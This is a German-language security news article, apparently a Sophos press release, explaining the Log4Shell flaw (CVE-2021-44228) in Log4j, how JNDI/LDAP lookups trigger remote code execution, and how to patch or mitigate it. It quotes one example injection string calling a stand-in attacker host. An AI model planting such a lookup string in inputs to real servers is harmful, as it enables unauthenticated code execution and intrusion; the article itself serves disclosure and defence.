Stetig neue Entwicklung von Schwachstellentests

Java-Schwachstelle Log4Shell – Was passiert ist und was zu tun ist

Paul Ducklin: "Der entscheidende Punkt bei der Log4Shell-Attacke ist, dass der Server automatisch Code ausführt"



Nach den letzten Zero-Day-Schwachstellen wir Hafnium, Kaseya oder Solarwinds müssen sich Unternehmen erneut und vor allem schnell mit einer hochkarätigen Server-Schwachstelle namens Log4Shell auseinandersetzen. Die Schwachstelle ist mittlerweile offiziell als CVE-2021-44228 bekannt. Über die Zero-Day-Lücke in einer Java-Codebibliothek namens Log4j können Angreifer System Code ihrer Wahl auszuführen.

Neben den gravierenden Auswirkungen für Unternehmen stellt die Zero-Day-Lücke auch für Privatpersonen eine nicht zu unterschätzende Gefahr dar und ruft garantiert Trittbrettfahrer auf den Plan.

Paul Ducklin, IT-Security-Experte bei Sophos, erklärte: "Der entscheidende Punkt bei der Log4Shell-Attacke ist, dass der Server automatisch Code ausführt. Was auch immer ein Angreifer einem Server mit der Sicherheitslücke auftragen will, er kann es tun. Deshalb ist es enorm wichtig, so schnell wie möglich zu patchen, denn viele Leute da draußen, die nichts Gutes im Sinn haben, versuchen bereits auszutesten, welche Server noch angreifbar sind."

Der Name Log4Shell bezieht sich auf die Tatsache, dass der ausgenutzte Fehler in einer beliebten Java-Codebibliothek namens Log4j (Logging for Java) enthalten ist, und darauf, dass Angreifer, wenn sie die Lücke erfolgreich ausnutzen, praktisch eine Shell erhalten – also die Möglichkeit, jeden System Code ihrer Wahl auszuführen.

Und als ob diese Kommandogewalt noch nicht genug wäre, wurde die Sicherheitslücke als Zero-Day-Lücke getwittert, also als Sicherheitsfehler, der dokumentiert wird, bevor ein Patch zur Verfügung steht. Zudem wurde das Proof-of-Concept (PoC) auf GitHub veröffentlicht und das Problem damit weltweit bekannt, während es noch ungepatcht war. Entsprechend laut läuten seit Freitag weltweit die Alarmglocken und auch in Deutschland hat z.B. das BSI die Warnstufe Rot ausgerufen.

Unsachgemäße Eingabevalidierung

Die Schwachstelle, mittlerweile offiziell als CVE-2021-44228 bekannt, hat ihren Ursprung in einer harmlosen Anfragesendung an einen anfälligen Server, die einige Daten – beispielsweise einen HTTP-Header – einschließt, von denen die Cyberkriminellen erwarten (oder sogar wissen), dass der Server sie in seine Logdatei schreibt. Die so eingeschleusten Daten bilden eine versteckte "Sprengfalle", da der Server, während er die Daten in ein für die Protokollierung geeignetes Format umwandelt, einen Web-Download als integralen Bestandteil der Erstellung des erforderlichen Protokolleintrags startet. Und diese Aktion hat es in sich, denn wenn die zurückkommenden Daten ein gültiges Java-Programm sind (eine .class-Datei, im Jargon), dann führt der Server diese Datei aus, um ihm bei der Generierung der Protokolldaten zu helfen.

Der Trick besteht darin, dass ungepatchte Versionen der Log4j-Bibliothek standardmäßig Protokollierungsanforderungen ermöglichen, um allgemeine LDAP-Suchen (Verzeichnisdienste) sowie verschiedene andere Online-Suchen auszulösen. Dieses "Feature" existiert, um dabei zu helfen, nicht sehr nützliche Daten, zum Beispiel Benutzer-IDs wie OZZJ5JYPVK, in menschenlesbare Informationen umzuwandeln, die in Ihrem Netzwerk sinnvoll sind, wie beispielsweise Peter Müller. Diese Anfragen erfolgen über ein häufig verwendetes Java-Toolkit namens JNDI, kurz für Java Naming and Directory Interface.

Dieses Vorgehen ist so lange tragbar, wie die protokollierten Daten, die eine Ausführung von serverseitigem Code auslösen können, auf Verzeichnisserver im eigenen Netzwerk beschränkt sind. Allerdings sind viel Server nicht entsprechend eingerichtet, und so könnten bösartige "Logsploiter" versuchen, Text wie {$jndi:ldap://dodgy.example:389/badcode} in die Daten einzubetten, von denen sie erwarten, dass Unternehmen sie protokollieren und Server dabei automatisch

>> JNDI verwenden, um eine LDAP-Anfrage an den angegebenen Port (in unserem Beispiel 389) auf dem angegebenen nicht vertrauenswürdigen externen Server zu senden.

>> den nicht vertrauenswürdigen Inhalt in den Standort Badcode abrufen.

>> den vom Angreifer bereitgestellten Code ausführen, um "Hilfe" bei der Protokollierung zu erhalten.

Einfach ausgedrückt, wird dieses Vorgehen im Fachjargon als nicht authentifizierte Remote Code Execution (RCE) bezeichnet. Ohne sich anzumelden oder ein Passwort oder Zugriffs-Token zu benötigen, könnten Cyberkriminelle eine harmlos aussehende Anfrage verwenden, um Server dazu zu bringen, sich zu melden, ihren Code herunterzuladen und sich so mit ihrer Malware zu infizieren. Je nachdem, welche Zugriffsrechte ein Server auf das interne Netzwerk hat, kann eine solche RCE Cyberkriminellen dabei helfen, eine Vielzahl schädlicher Aufgaben auszuführen.

Und genau das macht die aktuelle Schachstelle Log4Shell so gefährlich. Angreifer können theoretisch Daten vom Server selbst abfließen lassen; Details über das interne Netzwerk erfahren, Daten auf dem Server ändern; Daten von anderen Servern im Netzwerk exfiltrieren; zusätzliche Hintertüren auf dem Server oder dem Netzwerk für zukünftige Angriffe einrichten oder weitere Malware wie Netzwerk-Snooper, Memory Scraper, Data Stealer und Cryptominer installieren.

Was ist zu tun?

Lizenzgeber Apache hat zu diesem Thema einen praktischen Sicherheitshinweis veröffentlicht. Sophos fasst außerdem noch einmal das Wichtigste zusammen:

>> Upgrade auf Apache Log4j 2.15.0. Wenn Sie Log4j verwenden, ist jede 2.x-Version von 2.14.1 und früher anscheinend standardmäßig anfällig. (Wenn Sie noch Log4j 1.x verwenden, ist ebenfalls ein Upgrade Pflicht, da es nicht mehr mit Updates versorgt wird).

>> Blockieren der Möglichkeit, dass JNDI Anfragen an nicht vertrauenswürdige Server stellt. Wenn Sie nicht aktualisieren können, aber Log4j 2.10.0 oder höher verwenden, können Sie den Konfigurationswert log4j2.formatMsgNoLookups auf true setzen, was das Ausgehen von LDAP und ähnlichen Abfragen von vornherein verhindert.

>> Überprüfung der verwendeten Java-Laufzeit. Der zugrunde liegende Java Build, den Sie nutzen, verhindert möglicherweise, dass dieser Fehler basierend auf seiner eigenen Standardkonfiguration ausgelöst wird. Apache listet beispielsweise Oracle Java 8u121 explizit als Schutz vor diesem RCE auf.

Betrifft die Sicherheitslücke auch private Nutzer?

Log4Shell bedeutet nicht nur Alarmstufe Rot für Unternehmen, sondern auch private Nutzer können durchaus von den Auswirkungen der Lücke betroffen sein. Das gilt vor allem dann, wenn Privatpersonen Cloud-Server nutzen, die von einem Hosting-Unternehmen oder einem anderen Managed-Service-Provider betrieben werden – sei es ein Blog, ein Forum oder die Familienwebsite. Hier gilt es nun zunächst einmal herauszufinden, ob diese Services angreifbar und wann Patches geplant sind. Aktuell macht es sicherlich mehr Sinn, auf den entsprechenden Webseiten nach Informationen zu suchen, da die Anbieter höchstwahrscheinlich momentan von E-Mails überflutet werden.

Zusätzlich sollte auf offizielle Sicherheitswarnungen von genutzten Online-Diensten im Postfach geachtet werden...aber auch hier gilt es, Vorsicht walten zu lassen! Wenn Nutzer Nachrichten über die aktuelle Sicherheitslücke erhalten – eventuell noch von einem prominenten Serviceanbieter, sollten sie nicht automatisch auf die in der Warnmeldung angegeben Links klicken und auch keine Telefonnummern ohne kritische Prüfung wählen. Medienwirksame Cyberattacken wie Log4Shell rufen schnell Trittbrettfahren auf den Plan, die die Angst der Nutzer für ihre Phishing-Attacken nutzen wollen. Im Zweifelsfall sollten Nutzer ihren eigenen Weg zur Informationsbeschaffung finden, indem Sie URLs, E-Mail-Adressen oder Telefonnummern verwenden, die sie bereits früher genutzt haben. (Sophos: ra)

Hier geht es zum Schwerpunkt

eingetragen: 14.12.21
Newsletterlauf: 17.02.22

Sophos: Kontakt und Steckbrief

Der Informationsanbieter hat seinen Kontakt leider noch nicht freigeschaltet.


Meldungen: Unternehmen

Überwachungs- und Reaktionsfunktionen für Cybersicherheitsvorfälle

C2A Security und die Stefanini Group haben eine Zusammenarbeit angekündigt, um der Automobilindustrie eine robuste Cybersicherheitslösung anbieten zu können. Die Zusammenarbeit bietet Erstausrüstern und ihren Lieferanten sowohl Stefaninis fortschrittliche Security Operations Center (SOC)-Services als auch die Cybersicherheitslösung für den gesamten Fahrzeuglebenszyklus von C2A Security. So soll die Lücke zwischen Produktsicherheit und Sicherheitsüberwachung geschlossen werden.

ReliaQuest übernimmt Digital Shadows

ReliaQuest, US-Anbieterin im Bereich Security Operations und Cybersicherheit, gab die Vereinbarung zur Übernahme von Threat Intelligence-Expertin Digital Shadows für 160 Millionen US-Dollar bekannt. Die umfassende Expertise von ReliaQuest rund um Detection and Response für Cloud-, Netzwerk- und Endpunktumgebungen trifft damit auf das Know-how von Digital Shadows im Bereich Cyber Threat Intelligence (CTI) und Digital Risk Protection (DRP).

BSI und Samsung intensivieren Partnerschaft

Beim Thema sichere mobile Kommunikation (SMK) von Ministerien und Bundesbehörden arbeiten das BSI (Bundesamt für Sicherheit in der Informationstechnik) und Samsung zukünftig Hand in Hand: Ein von Samsung entwickeltes Java Card Applet soll – in Kombination mit dem auf dem Galaxy Smartphone verbauten embedded Secure Element (eSE) – die bisher verwendete MicroSD-Karte ersetzen, die gegenwärtig für die Datenverschlüsselung und sichere Datenübertragung genutzt wurde.

Private Akademie für Cybersicherheit

Exclusive Networks hat sich mit führenden Vertretern der IT-Sicherheit zusammengetan, um weltweite Maßnahmen zu entwickeln, die geeignet sind, den Personalmangel im Bereich der Cybersicherheit zu reduzieren. Derzeit fehlen schätzungsweise 2,7 Millionen Fachkräfte.

Besuchen Sie SaaS-Magazin.de

SaaS, On demand, ASP, Cloud Computing, Outsourcing >>>


Kostenloser Newsletter

Werktäglich informiert mit IT SecCity.de, Compliance-Magazin.de und SaaS-Magazin.de. Mit einem Newsletter Zugriff auf drei Online-Magazine. Bestellen Sie hier

Fachartikel

Grundlagen

Big Data bringt neue Herausforderungen mit sich

Die Digitale Transformation zwingt Unternehmen sich mit Big Data auseinanderzusetzen. Diese oft neue Aufgabe stellt viele IT-Teams hinsichtlich Datenverwaltung, -schutz und -verarbeitung vor große Herausforderungen. Die Nutzung eines Data Vaults mit automatisiertem Datenmanagement kann Unternehmen helfen, diese Herausforderungen auch mit kleinen IT-Teams zu bewältigen. Big Data war bisher eine Teildisziplin der IT, mit der sich tendenziell eher nur Großunternehmen beschäftigen mussten. Für kleinere Unternehmen war die Datenverwaltung trotz wachsender Datenmenge meist noch überschaubar. Doch die Digitale Transformation macht auch vor Unternehmen nicht halt, die das komplizierte Feld Big Data bisher anderen überlassen haben. IoT-Anwendungen lassen die Datenmengen schnell exponentiell anschwellen. Und während IT-Teams die Herausforderung der Speicherung großer Datenmengen meist noch irgendwie in den Griff bekommen, hakt es vielerorts, wenn es darum geht, aus all den Daten Wert zu schöpfen. Auch das Know-how für die Anforderungen neuer Gesetzgebung, wie der DSGVO, ist bei kleineren Unternehmen oft nicht auf dem neuesten Stand. Was viele IT-Teams zu Beginn ihrer Reise in die Welt von Big Data unterschätzen, ist zum einen die schiere Größe und zum anderen die Komplexität der Datensätze. Auch der benötigte Aufwand, um berechtigten Zugriff auf Daten sicherzustellen, wird oft unterschätzt.

Bösartige E-Mail- und Social-Engineering-Angriffe

Ineffiziente Reaktionen auf E-Mail-Angriffe sorgen bei Unternehmen jedes Jahr für Milliardenverluste. Für viele Unternehmen ist das Auffinden, Identifizieren und Entfernen von E-Mail-Bedrohungen ein langsamer, manueller und ressourcenaufwendiger Prozess. Infolgedessen haben Angriffe oft Zeit, sich im Unternehmen zu verbreiten und weitere Schäden zu verursachen. Laut Verizon dauert es bei den meisten Phishing-Kampagnen nur 16 Minuten, bis jemand auf einen bösartigen Link klickt. Bei einer manuellen Reaktion auf einen Vorfall benötigen Unternehmen jedoch circa dreieinhalb Stunden, bis sie reagieren. In vielen Fällen hat sich zu diesem Zeitpunkt der Angriff bereits weiter ausgebreitet, was zusätzliche Untersuchungen und Gegenmaßnahmen erfordert.

Zertifikat ist allerdings nicht gleich Zertifikat

Für Hunderte von Jahren war die Originalunterschrift so etwas wie der De-facto-Standard um unterschiedlichste Vertragsdokumente und Vereinbarungen aller Art rechtskräftig zu unterzeichnen. Vor inzwischen mehr als einem Jahrzehnt verlagerten sich immer mehr Geschäftstätigkeiten und mit ihnen die zugehörigen Prozesse ins Internet. Es hat zwar eine Weile gedauert, aber mit dem Zeitalter der digitalen Transformation beginnen handgeschriebene Unterschriften auf papierbasierten Dokumenten zunehmend zu verschwinden und digitale Signaturen werden weltweit mehr und mehr akzeptiert.

Datensicherheit und -kontrolle mit CASBs

Egal ob Start-up oder Konzern: Collaboration Tools sind auch in deutschen Unternehmen überaus beliebt. Sie lassen sich besonders leicht in individuelle Workflows integrieren und sind auf verschiedenen Endgeräten nutzbar. Zu den weltweit meistgenutzten Collaboration Tools gehört derzeit Slack. Die Cloudanwendung stellt allerdings eine Herausforderung für die Datensicherheit dar, die nur mit speziellen Cloud Security-Lösungen zuverlässig bewältigt werden kann. In wenigen Jahren hat sich Slack von einer relativ unbekannten Cloud-Anwendung zu einer der beliebtesten Team Collaboration-Lösungen der Welt entwickelt. Ihr Siegeszug in den meisten Unternehmen beginnt häufig mit einem Dasein als Schatten-Anwendung, die zunächst nur von einzelnen unternehmensinternen Arbeitsgruppen genutzt wird. Von dort aus entwickelt sie sich in der Regel schnell zum beliebtesten Collaboration-Tool in der gesamten Organisation.

KI: Neue Spielregeln für IT-Sicherheit

Gerade in jüngster Zeit haben automatisierte Phishing-Angriffe relativ plötzlich stark zugenommen. Dank künstlicher Intelligenz (KI), maschinellem Lernen und Big Data sind die Inhalte deutlich überzeugender und die Angriffsmethodik überaus präzise. Mit traditionellen Phishing-Angriffen haben die Attacken nicht mehr viel gemein. Während IT-Verantwortliche KI einsetzen, um Sicherheit auf die nächste Stufe zu bringen, darf man sich getrost fragen, was passiert, wenn diese Technologie in die falschen Hände, die der Bad Guys, gerät? Die Weiterentwicklung des Internets und die Fortschritte beim Computing haben uns in die Lage versetzt auch für komplexe Probleme exakte Lösungen zu finden. Von der Astrophysik über biologische Systeme bis hin zu Automatisierung und Präzision. Allerdings sind alle diese Systeme inhärent anfällig für Cyber-Bedrohungen. Gerade in unserer schnelllebigen Welt, in der Innovationen im kommen und gehen muss Cybersicherheit weiterhin im Vordergrund stehen. Insbesondere was die durch das Internet der Dinge (IoT) erzeugte Datenflut anbelangt. Beim Identifizieren von Malware hat man sich in hohem Maße darauf verlassen, bestimmte Dateisignaturen zu erkennen. Oder auf regelbasierte Systeme die Netzwerkanomalitäten aufdecken.

DDoS-Angriffe nehmen weiter Fahrt auf

DDoS-Attacken nehmen in Anzahl und Dauer deutlich zu, sie werden komplexer und raffinierter. Darauf machen die IT-Sicherheitsexperten der PSW Group unter Berufung auf den Lagebericht zur IT-Sicherheit 2018 des Bundesamtes für Sicherheit in der Informationstechnik (BSI) aufmerksam. Demnach gehörten DDoS-Attacken 2017 und 2018 zu den häufigsten beobachteten Sicherheitsvorfällen. Im dritten Quartal 2018 hat sich das durchschnittliche DDoS-Angriffsvolumen im Vergleich zum ersten Quartal mehr als verdoppelt. Durchschnittlich 175 Angriffen pro Tag wurden zwischen Juli und September 2018 gestartet. Die Opfer waren vor allem Service-Provider in Deutschland, in Österreich und in der Schweiz: 87 Prozent aller Provider wurden 2018 angegriffen. Und bereits für das 1. Quartal dieses Jahres registrierte Link11 schon 11.177 DDoS-Angriffe.

Fluch und Segen des Darkwebs

Strengere Gesetzesnormen für Betreiber von Internet-Plattformen, die Straftaten ermöglichen und zugangsbeschränkt sind - das forderte das BMI in einem in Q1 2019 eingebrachten Gesetzesantrag. Was zunächst durchweg positiv klingt, wird vor allem von Seiten der Bundesdatenschützer scharf kritisiert. Denn hinter dieser Forderung verbirgt sich mehr als nur das Verbot von Webseiten, die ein Tummelplatz für illegale Aktivitäten sind. Auch Darkweb-Plattformen, die lediglich unzugänglichen und anonymen Speicherplatz zur Verfügung stellen, unterlägen der Verordnung. Da diese nicht nur von kriminellen Akteuren genutzt werden, sehen Kritiker in dem Gesetzesentwurf einen starken Eingriff in die bürgerlichen Rechte. Aber welche Rolle spielt das Darkweb grundsätzlich? Und wie wird sich das "verborgene Netz" in Zukunft weiterentwickeln? Sivan Nir, Threat Analysis Team Leader bei Skybox Security, äußert sich zu den zwei Gesichtern des Darkwebs und seiner Zukunft.

Diese Webseite verwendet Cookies - Wir verwenden Cookies, um Inhalte und Anzeigen zu personalisieren, Funktionen für soziale Medien anbieten zu können und die Zugriffe auf unsere Website zu analysieren. Außerdem geben wir Informationen zu Ihrer Verwendung unserer Website an unsere Partner für soziale Medien, Werbung und Analysen weiter. Unsere Partner führen diese Informationen möglicherweise mit weiteren Daten zusammen, die Sie ihnen bereitgestellt haben oder die sie im Rahmen Ihrer Nutzung der Dienste gesammelt haben. Mit dem Klick auf „Erlauben“erklären Sie sich damit einverstanden. Weiterführende Informationen erhalten Sie in unserer Datenschutzerklärung.